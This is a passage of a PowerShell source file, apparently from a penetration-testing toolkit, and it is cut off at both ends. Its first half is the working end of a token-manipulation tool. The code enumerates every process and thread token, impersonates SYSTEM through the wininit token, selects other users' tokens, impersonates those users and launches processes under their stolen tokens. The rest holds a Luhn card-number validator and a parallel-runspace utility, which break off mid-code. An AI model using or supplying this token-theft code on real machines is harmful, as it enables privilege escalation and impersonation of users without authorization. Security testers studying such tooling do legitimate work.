[System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenSessionIdPtr, [Type][UInt32]) $ReturnObj.SessionID = $TokenSessionId } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenSessionIdPtr) #Query the token privileges $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesEnabled -Value @() $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesAvailable -Value @() [UInt32]$TokenPrivilegesSize = 1000 [IntPtr]$TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivilegesSize) [UInt32]$RealSize = 0 $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenPrivileges, $TokenPrivilegesPtr, $TokenPrivilegesSize, [Ref]$RealSize) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode" } else { $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES) #Loop through each privilege [IntPtr]$PrivilegesBasePtr = [IntPtr](Add-SignedIntAsUnsigned $TokenPrivilegesPtr ([System.Runtime.InteropServices.Marshal]::OffsetOf([Type]$TOKEN_PRIVILEGES, "Privileges"))) $LuidAndAttributeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES) for ($i = 0; $i -lt $TokenPrivileges.PrivilegeCount; $i++) { $LuidAndAttributePtr = [IntPtr](Add-SignedIntAsUnsigned $PrivilegesBasePtr ($LuidAndAttributeSize * $i)) $LuidAndAttribute = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributePtr, [Type]$LUID_AND_ATTRIBUTES) #Lookup privilege name [UInt32]$PrivilegeNameSize = 60 $PrivilegeNamePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PrivilegeNameSize) $PLuid = $LuidAndAttributePtr #The Luid structure is the first object in the LuidAndAttributes structure, so a ptr to LuidAndAttributes also points to Luid $Success = $LookupPrivilegeNameW.Invoke([IntPtr]::Zero, $PLuid, $PrivilegeNamePtr, [Ref]$PrivilegeNameSize) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "Call to LookupPrivilegeNameW failed. Error code: $ErrorCode. RealSize: $PrivilegeNameSize" } $PrivilegeName = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($PrivilegeNamePtr) #Get the privilege attributes $PrivilegeStatus = "" $Enabled = $false if ($LuidAndAttribute.Attributes -eq 0) { $Enabled = $false } if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) -eq $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) #enabled by default { $Enabled = $true } if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED) -eq $Win32Constants.SE_PRIVILEGE_ENABLED) #enabled { $Enabled = $true } if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_REMOVED) -eq $Win32Constants.SE_PRIVILEGE_REMOVED) #SE_PRIVILEGE_REMOVED. This should never exist. Write a warning if it is found so I can investigate why/how it was found. { Write-Warning "Unexpected behavior: Found a token with SE_PRIVILEGE_REMOVED. Please report this as a bug. " } if ($Enabled) { $ReturnObj.PrivilegesEnabled += ,$PrivilegeName } else { $ReturnObj.PrivilegesAvailable += ,$PrivilegeName } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($PrivilegeNamePtr) } } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) } else { Write-Verbose "Call to LsaGetLogonSessionData succeeded. This SHOULD be SYSTEM since there is no data. $($LogonSessionData.UserName.Length)" } #Free LogonSessionData $ntstatus = $LsaFreeReturnBuffer.Invoke($LogonSessionDataPtr) $LogonSessionDataPtr = [IntPtr]::Zero if ($ntstatus -ne 0) { Write-Warning "Call to LsaFreeReturnBuffer failed. Error code: $ntstatus" } } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr) $LuidPtr = [IntPtr]::Zero } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenStatsPtr) $TokenStatsPtr = [IntPtr]::Zero return $ReturnObj } #Takes an array of TokenObjects built by the script and returns the unique ones function Get-UniqueTokens { Param( [Parameter(Position=0, Mandatory=$true)] [Object[]] $AllTokens ) $TokenByUser = @{} $TokenByEnabledPriv = @{} $TokenByAvailablePriv = @{} #Filter tokens by user foreach ($Token in $AllTokens) { $Key = $Token.Domain + "\" + $Token.Username if (-not $TokenByUser.ContainsKey($Key)) { #Filter out network logons and junk Windows accounts. This filter eliminates accounts which won't have creds because # they are network logons (type 3) or logons for which the creds don't matter like LOCOAL SERVICE, DWM, etc.. if ($Token.LogonType -ne 3 -and $Token.Username -inotmatch "^DWM-\d+$" -and $Token.Username -inotmatch "^LOCAL\sSERVICE$") { $TokenByUser.Add($Key, $Token) } } else { #If Tokens have equal elevation levels, compare their privileges. if($Token.IsElevated -eq $TokenByUser[$Key].IsElevated) { if (($Token.PrivilegesEnabled.Count + $Token.PrivilegesAvailable.Count) -gt ($TokenByUser[$Key].PrivilegesEnabled.Count + $TokenByUser[$Key].PrivilegesAvailable.Count)) { $TokenByUser[$Key] = $Token } } #If the new token is elevated and the current token isn't, use the new token elseif (($Token.IsElevated -eq $true) -and ($TokenByUser[$Key].IsElevated -eq $false)) { $TokenByUser[$Key] = $Token } } } #Filter tokens by privilege foreach ($Token in $AllTokens) { $Fullname = "$($Token.Domain)\$($Token.Username)" #Filter currently enabled privileges foreach ($Privilege in $Token.PrivilegesEnabled) { if ($TokenByEnabledPriv.ContainsKey($Privilege)) { if($TokenByEnabledPriv[$Privilege] -notcontains $Fullname) { $TokenByEnabledPriv[$Privilege] += ,$Fullname } } else { $TokenByEnabledPriv.Add($Privilege, @($Fullname)) } } #Filter currently available (but not enable) privileges foreach ($Privilege in $Token.PrivilegesAvailable) { if ($TokenByAvailablePriv.ContainsKey($Privilege)) { if($TokenByAvailablePriv[$Privilege] -notcontains $Fullname) { $TokenByAvailablePriv[$Privilege] += ,$Fullname } } else { $TokenByAvailablePriv.Add($Privilege, @($Fullname)) } } } $ReturnDict = @{ TokenByUser = $TokenByUser TokenByEnabledPriv = $TokenByEnabledPriv TokenByAvailablePriv = $TokenByAvailablePriv } return (New-Object PSObject -Property $ReturnDict) } function Invoke-ImpersonateUser { Param( [Parameter(Position=0, Mandatory=$true)] [IntPtr] $hToken ) #Duplicate the token so it can be used to create a new process [IntPtr]$NewHToken = [IntPtr]::Zero $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken) #todo does this need to be freed if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "DuplicateTokenEx failed. ErrorCode: $ErrorCode" } else { $Success = $ImpersonateLoggedOnUser.Invoke($NewHToken) if (-not $Success) { $Errorcode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "Failed to ImpersonateLoggedOnUser. Error code: $Errorcode" } } $Success = $CloseHandle.Invoke($NewHToken) $NewHToken = [IntPtr]::Zero if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode" } return $Success } function Create-ProcessWithToken { Param( [Parameter(Position=0, Mandatory=$true)] [IntPtr] $hToken, [Parameter(Position=1, Mandatory=$true)] [String] $ProcessName, [Parameter(Position=2)] [String] $ProcessArgs, [Parameter(Position=3)] [Switch] $PassThru ) Write-Verbose "Entering Create-ProcessWithToken" #Duplicate the token so it can be used to create a new process [IntPtr]$NewHToken = [IntPtr]::Zero $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "DuplicateTokenEx failed. ErrorCode: $ErrorCode" } else { $StartupInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$STARTUPINFO) [IntPtr]$StartupInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($StartupInfoSize) $memset.Invoke($StartupInfoPtr, 0, $StartupInfoSize) | Out-Null [System.Runtime.InteropServices.Marshal]::WriteInt32($StartupInfoPtr, $StartupInfoSize) #The first parameter (cb) is a DWORD which is the size of the struct $ProcessInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$PROCESS_INFORMATION) [IntPtr]$ProcessInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ProcessInfoSize) $ProcessNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni("$ProcessName") $ProcessArgsPtr = [IntPtr]::Zero if (-not [String]::IsNullOrEmpty($ProcessArgs)) { $ProcessArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni("`"$ProcessName`" $ProcessArgs") } $FunctionName = "" if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0) { #Cannot use CreateProcessWithTokenW when in Session0 because CreateProcessWithTokenW throws an ACCESS_DENIED error. I believe it is because #this API attempts to modify the desktop ACL. I would just use this API all the time, but it requires that I enable SeAssignPrimaryTokenPrivilege #which is not ideal. Write-Verbose "Running in Session 0. Enabling SeAssignPrimaryTokenPrivilege and calling CreateProcessAsUserW to create a process with alternate token." Enable-Privilege -Privilege SeAssignPrimaryTokenPrivilege $Success = $CreateProcessAsUserW.Invoke($NewHToken, $ProcessNamePtr, $ProcessArgsPtr, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr) $FunctionName = "CreateProcessAsUserW" } else { Write-Verbose "Not running in Session 0, calling CreateProcessWithTokenW to create a process with alternate token." $Success = $CreateProcessWithTokenW.Invoke($NewHToken, 0x0, $ProcessNamePtr, $ProcessArgsPtr, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr) $FunctionName = "CreateProcessWithTokenW" } if ($Success) { #Free the handles returned in the ProcessInfo structure $ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION) $CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null $CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null #Pass created System.Diagnostics.Process object to pipeline if ($PassThru) { #Retrieving created System.Diagnostics.Process object $returnProcess = Get-Process -Id $ProcessInfo.dwProcessId #Caching process handle so we don't lose it when the process exits $null = $returnProcess.Handle #Passing System.Diagnostics.Process object to pipeline $returnProcess } } else { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "$FunctionName failed. Error code: $ErrorCode" } #Free StartupInfo memory and ProcessInfo memory [System.Runtime.InteropServices.Marshal]::FreeHGlobal($StartupInfoPtr) $StartupInfoPtr = [Intptr]::Zero [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcessInfoPtr) $ProcessInfoPtr = [IntPtr]::Zero [System.Runtime.InteropServices.Marshal]::ZeroFreeGlobalAllocUnicode($ProcessNamePtr) $ProcessNamePtr = [IntPtr]::Zero #Close handle for the token duplicated with DuplicateTokenEx $Success = $CloseHandle.Invoke($NewHToken) $NewHToken = [IntPtr]::Zero if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode" } } } function Free-AllTokens { Param( [Parameter(Position=0, Mandatory=$true)] [PSObject[]] $TokenInfoObjs ) foreach ($Obj in $TokenInfoObjs) { $Success = $CloseHandle.Invoke($Obj.hToken) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Verbose "Failed to close token handle in Free-AllTokens. ErrorCode: $ErrorCode" } $Obj.hToken = [IntPtr]::Zero } } #Enumerate all tokens on the system. Returns an array of objects with the token and information about the token. function Enum-AllTokens { $AllTokens = @() #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token. #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges, so impersonate the wininit token. $systemTokenInfo = Get-PrimaryToken -ProcessId (Get-Process wininit | where {$_.SessionId -eq 0}).Id if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) { Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens" } if ($systemTokenInfo -ne $null -and $systemTokenInfo.hProcToken -ne [IntPtr]::Zero) { $CloseHandle.Invoke($systemTokenInfo.hProcToken) | Out-Null $systemTokenInfo = $null } $ProcessIds = get-process | where {$_.name -inotmatch "^csrss$" -and $_.name -inotmatch "^system$" -and $_.id -ne 0} #Get all tokens foreach ($Process in $ProcessIds) { $PrimaryTokenInfo = (Get-PrimaryToken -ProcessId $Process.Id -FullPrivs) #If a process is a protected process, it's primary token cannot be obtained. Don't try to enumerate it. if ($PrimaryTokenInfo -ne $null) { [IntPtr]$hToken = [IntPtr]$PrimaryTokenInfo.hProcToken if ($hToken -ne [IntPtr]::Zero) { #Get the LUID corrosponding to the logon $ReturnObj = Get-TokenInformation -hToken $hToken if ($ReturnObj -ne $null) { $ReturnObj | Add-Member -MemberType NoteProperty -Name ProcessId -Value $Process.Id $AllTokens += $ReturnObj } } else { Write-Warning "Couldn't retrieve token for Process: $($Process.Name). ProcessId: $($Process.Id)" } foreach ($Thread in $Process.Threads) { $ThreadTokenInfo = Get-ThreadToken -ThreadId $Thread.Id [IntPtr]$hToken = ($ThreadTokenInfo.hThreadToken) if ($hToken -ne [IntPtr]::Zero) { $ReturnObj = Get-TokenInformation -hToken $hToken if ($ReturnObj -ne $null) { $ReturnObj | Add-Member -MemberType NoteProperty -Name ThreadId -Value $Thread.Id $AllTokens += $ReturnObj } } } } } return $AllTokens } function Invoke-RevertToSelf { Param( [Parameter(Position=0)] [Switch] $ShowOutput ) $Success = $RevertToSelf.Invoke() if ($ShowOutput) { if ($Success) { Write-Output "RevertToSelf was successful. Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)" } else { Write-Output "RevertToSelf failed. Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)" } } } #Main function function Main { #If running in session 0, force NoUI if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0) { Write-Verbose "Running in Session 0, forcing NoUI (processes in Session 0 cannot have a UI)" $NoUI = $true } if ($PsCmdlet.ParameterSetName -ieq "RevToSelf") { Invoke-RevertToSelf -ShowOutput } elseif ($PsCmdlet.ParameterSetName -ieq "CreateProcess" -or $PsCmdlet.ParameterSetName -ieq "ImpersonateUser") { $AllTokens = Enum-AllTokens #Select the token to use [IntPtr]$hToken = [IntPtr]::Zero $UniqueTokens = (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser if ($Username -ne $null -and $Username -ne '') { if ($UniqueTokens.ContainsKey($Username)) { $hToken = $UniqueTokens[$Username].hToken Write-Verbose "Selecting token by username" } else { Write-Error "A token belonging to the specified username was not found. Username: $($Username)" -ErrorAction Stop } } elseif ( $ProcessId -ne $null -and $ProcessId -ne 0) { foreach ($Token in $AllTokens) { if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $ProcessId) { $hToken = $Token.hToken Write-Verbose "Selecting token by ProcessID" } } if ($hToken -eq [IntPtr]::Zero) { Write-Error "A token belonging to ProcessId $($ProcessId) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened." -ErrorAction Stop } } elseif ($ThreadId -ne $null -and $ThreadId -ne 0) { foreach ($Token in $AllTokens) { if (($Token | Get-Member ThreadId) -and $Token.ThreadId -eq $ThreadId) { $hToken = $Token.hToken Write-Verbose "Selecting token by ThreadId" } } if ($hToken -eq [IntPtr]::Zero) { Write-Error "A token belonging to ThreadId $($ThreadId) could not be found. Either the thread doesn't exist or the thread is in a protected process and cannot be opened." -ErrorAction Stop } } elseif ($Process -ne $null) { foreach ($Token in $AllTokens) { if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $Process.Id) { $hToken = $Token.hToken if($Instance){ Write-Verbose "$Instance : Selecting token by Process object" }else{ Write-Verbose "Selecting token by Process object" } } } if ($hToken -eq [IntPtr]::Zero) { Write-Error "A token belonging to Process $($Process.Name) ProcessId $($Process.Id) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened." -ErrorAction Stop } } else { Write-Error "Must supply a Username, ProcessId, ThreadId, or Process object" -ErrorAction Stop } #Use the token for the selected action if ($PsCmdlet.ParameterSetName -ieq "CreateProcess") { if (-not $NoUI) { Set-DesktopACLs } Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs -PassThru:$PassThru Invoke-RevertToSelf } elseif ($ImpersonateUser) { Invoke-ImpersonateUser -hToken $hToken | Out-Null Write-Output "Running As: $([Environment]::UserDomainName)\$([Environment]::UserName)" } Free-AllTokens -TokenInfoObjs $AllTokens } elseif ($PsCmdlet.ParameterSetName -ieq "WhoAmI") { Write-Output "$([Environment]::UserDomainName)\$([Environment]::UserName)" } else #Enumerate tokens { $AllTokens = Enum-AllTokens if ($PsCmdlet.ParameterSetName -ieq "ShowAll") { Write-Output $AllTokens } else { Write-Output (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser.Values } Invoke-RevertToSelf Free-AllTokens -TokenInfoObjs $AllTokens } } #Start the main function Main } # ------------------------------------------- # Function: Test-IsLuhnValid # ------------------------------------------- # Author: ktaranov # Source: https://communary.net/2016/02/19/the-luhn-algorithm/ function Test-IsLuhnValid { <# .SYNOPSIS Valdidate a number based on the Luhn Algorithm. .DESCRIPTION This function uses the Luhn algorithm to validate a number that includes the Luhn checksum digit. .EXAMPLE Test-IsLuhnValid -Number 1234567890123452 This will validate whether the number is valid according to the Luhn Algorithm. .INPUTS System.UInt64 .OUTPUTS System.Boolean .NOTES Author: OYVIND KALLSTAD Date: 19.02.2016 Version: 1.0 Dependencies: Get-LuhnCheckSum, ConvertTo-Digits .LINKS https://en.wikipedia.org/wiki/Luhn_algorithm https://communary.wordpress.com/ https://github.com/gravejester/Communary.ToolBox #> [CmdletBinding()] param ( [Parameter(Mandatory = $true, Position = 0, ValueFromPipeline = $true)] [uint64]$Number ) $numberDigits = ConvertTo-Digits -Number $Number $checksumDigit = $numberDigits[-1] $numberWithoutChecksumDigit = $numberDigits[0..($numberDigits.Count - 2)] -join '' $checksum = Get-LuhnCheckSum -Number $numberWithoutChecksumDigit $NumCount = ([string]$numberWithoutChecksumDigit).Length if ((($checksum + $checksumDigit) % 10) -eq 0 -and $NumCount -ge 12) { Write-Output -InputObject $true } else { Write-Output -InputObject $false } } # ------------------------------------------- # Function: ConvertTo-Digits # ------------------------------------------- # Author: OYVIND KALLSTAD # Source: https://communary.net/2016/02/19/the-luhn-algorithm/ function ConvertTo-Digits { <# .SYNOPSIS Convert an integer into an array of bytes of its individual digits. .DESCRIPTION Convert an integer into an array of bytes of its individual digits. .EXAMPLE ConvertTo-Digits 145 .INPUTS System.UInt64 .LINK https://communary.wordpress.com/ https://github.com/gravejester/Communary.ToolBox .NOTES Author: OYVIND KALLSTAD Date: 09.05.2015 Version: 1.0 #> [OutputType([System.Byte[]])] [CmdletBinding()] param( [Parameter(Position = 0, Mandatory = $true, ValueFromPipeline = $true)] [uint64]$Number ) $n = $Number $numberOfDigits = 1 + [convert]::ToUInt64([math]::Floor(([math]::Log10($n)))) $digits = New-Object -TypeName Byte[] -ArgumentList $numberOfDigits for ($i = ($numberOfDigits - 1); $i -ge 0; $i--) { $digit = $n % 10 $digits[$i] = $digit $n = [math]::Floor($n / 10) } Write-Output -InputObject $digits } # ------------------------------------------- # Function: Invoke-Parallel # ------------------------------------------- # Author: RamblingCookieMonster # Source: https://github.com/RamblingCookieMonster/Invoke-Parallel # Notes: Added "ImportSessionFunctions" to import custom functions from the current session into the runspace pool. function Invoke-Parallel { <# .SYNOPSIS Function to control parallel processing using runspaces .DESCRIPTION Function to control parallel processing using runspaces Note that each runspace will not have access to variables and commands loaded in your session or in other runspaces by default. This behaviour can be changed with parameters. .PARAMETER ScriptFile File to run against all input objects. Must include parameter to take in the input object, or use $args. Optionally, include parameter to take in parameter. Example: C:\script.ps1 .PARAMETER ScriptBlock Scriptblock to run against all computers. You may use $Using: language in PowerShell 3 and later. The parameter block is added for you, allowing behaviour similar to foreach-object: Refer to the input object as $_. Refer to the parameter parameter as $parameter .PARAMETER InputObject Run script against these specified objects. .PARAMETER Parameter This object is passed to every script block. You can use it to pass information to the script block; for example, the path to a logging folder Reference this object as $parameter if using the scriptblock parameterset. .PARAMETER ImportVariables If specified, get user session variables and add them to the initial session state .PARAMETER ImportModules If specified, get loaded modules and pssnapins, add them to the initial session state .PARAMETER Throttle Maximum number of threads to run at a single time. .PARAMETER SleepTimer Milliseconds to sleep after checking for completed runspaces and in a few other spots. I would not recommend dropping below 200 or increasing above 500 .PARAMETER RunspaceTimeout Maximum time in seconds a single thread can run. If execution of your code takes longer than this, it is disposed. Default: 0 (seconds) WARNING: Using this parameter requires that maxQueue be set to throttle (it will be by default) for accurate timing. Details here: http://gallery.technet.microsoft.com/Run-Parallel-Parallel-377fd430 .PARAMETER NoCloseOnTimeout Do not dispose of timed out tasks or attempt to close the runspace if threads have timed out. This will prevent the script from hanging in certain situations where threads become non-responsive, at the expense of leaking memory within the PowerShell host. .PARAMETER MaxQueue Maximum number of powershell instances to add to runspace pool. If this is higher than $throttle, $timeout will be inaccurate If this is equal or less than throttle, there will be a performance impact The default value is $throttle times 3, if $runspaceTimeout is not specified The default value is $throttle, if $runspaceTimeout is specified .PARAMETER LogFile Path to a file where we can log results, including run time for each thread, whether it completes, completes with errors, or times out. .PARAMETER Quiet Disable progress bar. .EXAMPLE Each example uses Test-ForPacs.ps1 which includes the following code: param($computer) if(test-connection $computer -count 1 -quiet -BufferSize 16){ $object = [pscustomobject] @{ Computer=$computer; Available=1; Kodak=$( if((test-path "\\$computer\c$\users\public\desktop\Kodak Direct View Pacs.url") -or (test-path "\\$computer\c$\documents and settings\all users \desktop\Kodak Direct View Pacs.url") ){"1"}else{"0"} ) } } else{ $object = [pscustomobject] @{ Computer=$computer; Available=0; Kodak="NA" } } $object .EXAMPLE Invoke-Parallel -scriptfile C:\public\Test-ForPacs.ps1 -inputobject $(get-content C:\pcs.txt) -runspaceTimeout 10 -throttle 10 Pulls list of PCs from C:\pcs.txt, Runs Test-ForPacs against each If any query takes longer than 10 seconds, it is disposed Only run 10 threads at a time .EXAMPLE Invoke-Parallel -scriptfile C:\public\Test-ForPacs.ps1 -inputobject c-is-ts-91, c-is-ts-95 Runs against c-is-ts-91, c-is-ts-95 (-computername) Runs Test-ForPacs against each .EXAMPLE $stuff = [pscustomobject] @{ ContentFile = "windows\system32\drivers\etc\hosts" Logfile = "C:\temp\log.txt" } $computers | Invoke-Parallel -parameter $stuff { $contentFile = join-path "\\$_\c$" $parameter.contentfile Get-Content $contentFile | set-content $parameter.logfile } This example uses the parameter argument. This parameter is a single object. To pass multiple items into the script block, we create a custom object (using a PowerShell v3 language) with properties we want to pass in. Inside the script block, $parameter is used to reference this parameter object. This example sets a content file, gets content from that file, and sets it to a predefined log file. .EXAMPLE $test = 5 1..2 | Invoke-Parallel -ImportVariables {$_ * $test} Add variables from the current session to the session state. Without -ImportVariables $Test would not be accessible .EXAMPLE $test = 5 1..2 | Invoke-Parallel {$_ * $Using:test} Reference a variable from the current session with the $Using: syntax. Requires PowerShell 3 or later. Note that -ImportVariables parameter is no longer necessary. .FUNCTIONALITY PowerShell Language .NOTES Credit to Boe Prox for the base runspace code and $Using implementation http://learn-powershell.net/2012/05/10/speedy-network-information-query-using-powershell/ http://gallery.technet.microsoft.com/scriptcenter/Speedy-Network-Information-5b1406fb#content https://github.com/proxb/PoshRSJob/ Credit to T Bryce Yehl for the Quiet and NoCloseOnTimeout implementations Credit to Sergei Vorobev for the many ideas and contributions that have improved functionality, reliability, and ease of use .LINK https://github.com/RamblingCookieMonster/Invoke-Parallel #> [cmdletbinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Mandatory = $false,position = 0,ParameterSetName = 'ScriptBlock')] [System.Management.Automation.ScriptBlock]$ScriptBlock, [Parameter(Mandatory = $false,ParameterSetName = 'ScriptFile')] [ValidateScript({ Test-Path $_ -PathType leaf })] $ScriptFile, [Parameter(Mandatory = $true,ValueFromPipeline = $true)] [Alias('CN','__Server','IPAddress','Server','ComputerName')] [PSObject]$InputObject, [PSObject]$Parameter, [switch]$ImportSessionFunctions, [switch]$ImportVariables, [switch]$ImportModules, [int]$Throttle = 20, [int]$SleepTimer = 200, [int]$RunspaceTimeout = 0, [switch]$NoCloseOnTimeout = $false, [int]$MaxQueue, [validatescript({ Test-Path (Split-Path -Path $_ -Parent) })] [string]$LogFile = 'C:\temp\log.log', [switch] $Quiet = $false ) Begin { #No max queue specified? Estimate one. #We use the script scope to resolve an odd PowerShell 2 issue where MaxQueue isn't seen later in the function if( -not $PSBoundParameters.ContainsKey('MaxQueue') ) { if($RunspaceTimeout -ne 0) { $script:MaxQueue = $Throttle } else { $script:MaxQueue = $Throttle * 3 } } else { $script:MaxQueue = $MaxQueue } #Write-Verbose "Throttle: '$throttle' SleepTimer '$sleepTimer' runSpaceTimeout '$runspaceTimeout' maxQueue '$maxQueue' logFile '$logFile'" #If they want to import variables or modules, create a clean runspace, get loaded items, use those to exclude items if ($ImportVariables -or $ImportModules) { $StandardUserEnv = [powershell]::Create().addscript({ #Get modules and snapins in this clean runspace $Modules = Get-Module | Select-Object -ExpandProperty Name $Snapins = Get-PSSnapin | Select-Object -ExpandProperty Name #Get variables in this clean runspace #Called last to get vars like $? into session $Variables = Get-Variable | Select-Object -ExpandProperty Name #Return a hashtable where we can access each. @{ Variables = $Variables Modules = $Modules Snapins = $Snapins } }).invoke()[0] if ($ImportVariables) { #Exclude common parameters, bound parameters, and automatic variables Function _temp { [cmdletbinding()] param() } $VariablesToExclude = @( (Get-Command _temp | Select-Object -ExpandProperty parameters).Keys + $PSBoundParameters.Keys + $StandardUserEnv.Variables ) #Write-Verbose "Excluding variables $( ($VariablesToExclude | sort ) -join ", ")" # we don't use 'Get-Variable -Exclude', because it uses regexps. # One of the veriables that we pass is '$?'. # There could be other variables with such problems. # Scope 2 required if we move to a real module $UserVariables = @( Get-Variable | Where-Object -FilterScript { -not ($VariablesToExclude -contains $_.Name) } ) #Write-Verbose "Found variables to import: $( ($UserVariables | Select -expandproperty Name | Sort ) -join ", " | Out-String).`n" } if ($ImportModules) { $UserModules = @( Get-Module | Where-Object -FilterScript { $StandardUserEnv.Modules -notcontains $_.Name -and (Test-Path -Path $_.Path -ErrorAction SilentlyContinue) } | Select-Object -ExpandProperty Path ) $UserSnapins = @( Get-PSSnapin | Select-Object -ExpandProperty Name | Where-Object -FilterScript { $StandardUserEnv.Snapins -notcontains $_ } ) } } #region functions Function Get-RunspaceData { [cmdletbinding()] param( [switch]$Wait ) #loop through runspaces #if $wait is specified, keep looping until all complete Do { #set more to false for tracking completion $more = $false #Progress bar if we have inputobject count (bound parameter) if (-not $Quiet) { Write-Progress -Activity 'Running Query' -Status 'Starting threads'` -CurrentOperation "$startedCount threads defined - $totalCount input objects - $script:completedCount input objects processed"` -PercentComplete $( Try { $script:completedCount / $totalCount * 100 } Catch { 0 } ) } #run through each runspace. Foreach($runspace in $runspaces) { #get the duration - inaccurate $currentdate = Get-Date $runtime = $currentdate - $runspace.startTime $runMin = [math]::Round( $runtime.totalminutes ,2 ) #set up log object $log = '' | Select-Object -Property Date, Action, Runtime, Status, Details $log.Action = "Removing:'$($runspace.object)'" $log.Date = $currentdate $log.Runtime = "$runMin minutes" #If runspace completed, end invoke, dispose, recycle, counter++ If ($runspace.Runspace.isCompleted) { $script:completedCount++ #check if there were errors if($runspace.powershell.Streams.Error.Count -gt 0) { #set the logging info and move the file to completed $log.status = 'CompletedWithErrors' #Write-Verbose ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] foreach($ErrorRecord in $runspace.powershell.Streams.Error) { Write-Error -ErrorRecord $ErrorRecord } } else { #add logging details and cleanup $log.status = 'Completed' #Write-Verbose ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] } #everything is logged, clean up the runspace $runspace.powershell.EndInvoke($runspace.Runspace) $runspace.powershell.dispose() $runspace.Runspace = $null $runspace.powershell = $null } #If runtime exceeds max, dispose the runspace ElseIf ( $RunspaceTimeout -ne 0 -and $runtime.totalseconds -gt $RunspaceTimeout) { $script:completedCount++ $timedOutTasks = $true #add logging details and cleanup $log.status = 'TimedOut' #Write-Verbose ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] Write-Error -Message "Runspace timed out at $($runtime.totalseconds) seconds for the object:`n$($runspace.object | Out-String)" #Depending on how it hangs, we could still get stuck here as dispose calls a synchronous method on the powershell instance if (!$NoCloseOnTimeout) { $runspace.powershell.dispose() } $runspace.Runspace = $null $runspace.powershell = $null $completedCount++ } #If runspace isn't null set more to true ElseIf ($runspace.Runspace -ne $null ) { $log = $null $more = $true } #log the results if a log file was indicated <# if($logFile -and $log){ ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] | out-file $LogFile -append } #> } #Clean out unused runspace jobs $temphash = $runspaces.clone() $temphash | Where-Object -FilterScript { $_.runspace 